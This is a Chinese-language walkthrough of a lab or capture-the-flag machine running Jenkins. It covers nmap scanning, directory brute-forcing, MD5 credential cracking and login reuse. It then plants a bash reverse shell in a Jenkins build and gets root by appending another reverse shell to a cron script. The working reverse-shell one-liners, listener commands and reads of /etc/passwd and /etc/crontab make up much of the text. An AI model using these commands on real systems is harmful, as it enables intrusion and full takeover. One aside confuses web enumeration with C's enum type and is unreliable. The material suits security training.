信息获取
ip扫描
sudo nmap -sn 192.168.203.0/24
进行nmap端口扫描
sudo nmap --min-rate 10000 -p- 192.168.203.140
继续扫描
sudo nmap -sT -sV -sC -O -p22,80,3306,8080 192.168.203.140
我们再进行一个脚本的扫描
sudo nmap --script=vuln -p22,80,3306,8080 192.168.203.140
22端口是ssh,渗透优先级排后
80端口是http,攻击面很大,可以优先考虑。有一个枚举,发现了个icons的潜在目录
(enum 枚举是 C 语言中的一种基本数据类型,用于定义一组具有离散值的常量。,它可以让数据更简洁,更易读。枚举类型通常用于为程序中的一组相关的常量取名字,以便于程序的可读性和维护性。)
3306的端口没多少有用的信息
8080端口发现了robots的目录
渗透阶段
我们先来看80端口。打开浏览器,输入ip进行访问。
我们可以看到这样一个jarbas的网站
我们再来看看8080端口。是一个登录的表单。
我们再看一下8080端口下的robots目录
“我们不想机器人去点击‘build’的链接”
好了,我们开始对80端口进行目录爆破
首先,我们下载feroxbuster
sudo apt install feroxbuster
安装后进行爆破
sudo gobuster dir -u http://192.168.203.140 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
没有什么发现,这是不正常的。我们试着增加扩展名去进行爆破
sudo gobuster dir -u http://192.168.203.140 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html.php
index是我们当前的页面,我们先访问一下access
“凭据被加密在一个安全的方式中”
我们去识别一下下面的字符,看看是什么加密方式,不出意外的话就是MD5。
hash-identifier 5978a63b4654c73c60fa24f836386d87
识别出来是MD5,那看来没错。我们去解密一下。
tiago:italia99
trindade:vipsu
eder:mariannna
我们回到登录页面,一个个的尝试登录
三个账号都进不去。我们试一下,使用eder账号,密码使用vipsu。
发现可以进入。这是JenKins的一个集成管理系统。我们先创建一个项目。
我们写入一个交互脚本。保存就行。
/bin/bash -i >& /dev/tcp/192.168.203.139/4444 0>&1
我们回到kali,打开4444监听。
sudo nc -lvnp 4444
我们点击build now
提权
看到了shell反弹。我们看看输入whoami,查看一下。
看到有一个jenkins的用户。我们查看一下有啥权限
sudo -l
看来没有啥权限。查看一下有多少用户。
cat /etc/passwd
我们现在就在jackson这个账户,有不正常的交互。我们试图去找其他账号。
我们查看一下系统的自动任务脚本
cat /etc/crontab
我们看到,最下边有条记录,每五分钟以root的权限,执行这个shell脚本,执行结果就是把它扔掉。
那我们再写入一个shell,打开监听,看看是否是root权限。
打开以下目录
cat /etc/script/CleaningScript.sh
开始执行脚本
echo "/bin/bash -i >& /dev/tcp/192.168.203.139/4443 0>&1" >> /etc/script/CleaningScript.sh
打开监听
sudo nc -lvnp 4443
我们等待五分钟。